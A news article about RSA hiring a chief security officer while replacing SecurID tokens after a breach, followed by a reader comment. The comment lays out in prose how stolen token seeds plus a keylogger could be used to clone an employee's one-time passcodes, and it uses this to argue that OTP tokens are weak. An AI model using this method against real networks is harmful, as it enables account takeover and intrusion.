What sort of a .net is it that doesn't have holes?
|
|
|
RSA hires a security chief as firms get busy replacing SecureID keys
CRYPTOGRAPHY FIRM RSA Security has appointed its first chief security officer as the company continues the time-consuming task of replacing SecureID keys that could have been affected by an attack its systems in March.
According to his Twitter account Eddie Schwartz moved from the chief security officer position at security firm Netwitness to the same role at RSA. Netwitness, a company that works on network monitoring technology, was recently acquired by RSA's parent company EMC.
As well as having held a role as chief security officer at Nationwide Insurance, he was previously a foreign service officer with the US State Department. He'll immediately be faced with some difficult tasks, such as restoring RSA's reputation after the theft of SecureID data, which the firm admitted was used in an attack on US military contractor Lockheed Martin and potentially others.
RSA's problems are related to SecureID devices, which are electronic keys or tokens used by many firms and organisations around the world and generate one-time passcodes to access confidential networks, computer systems and databases.
RSA hasn't been totally clear on details regarding the hacking of its systems, but it's thought that criminals might have discovered the algorithms used to generate SecureID keys and passcodes.
The company has said that it will replace the SecureID keys of some customers, with Reuters having reported that two Australian banks are already in that process. µ
Tags: Security
Share this:
Share
If we assume that the hackers that attacked Lockheed-Martin have access to the RSA algorithm, knowledge of what tokens are assigned to what companies, and a list of the seeds in those tokens, it becomes a bounded brute force exercise to figure out which token a specific employee is using.
Let me break this down into the steps used to hack into a network using this information. While it seems like I am giving away trade secrets, the hackers have already used this knowledge.
Drop malware onto a targeted PC owned by XYZ company that will install a keylogger.
Capture the user name, password, and RSA token response when the user logs in to the XYZ corporate network from the targeted PC.
One at a time, input the time that the OTP was captured by the keystroke logger along with one of the stolen seeds that belong to the RSA tokens owned by XYZ company into the SecurID algorithm. One of the seeds will generate an OTP that matches the captured value.
Using the information from step 3, you can determine which token is in use by the targeted employee. You know have his user name and static password and can use the seed and the current time to generate as many OTPs as you like.
While it’s easy to take shots at RSA, this is not just an RSA problem. It is a problem with all OTP tokens. Because the token and an authentication server have to generate and match the same OTP, they must have a shared secret. And as we have seen, once the algorithm and shared secret get out, the protection is broken.
Maybe this is FINALLY the year of Public Key Infrastructure (PKI) for authentication!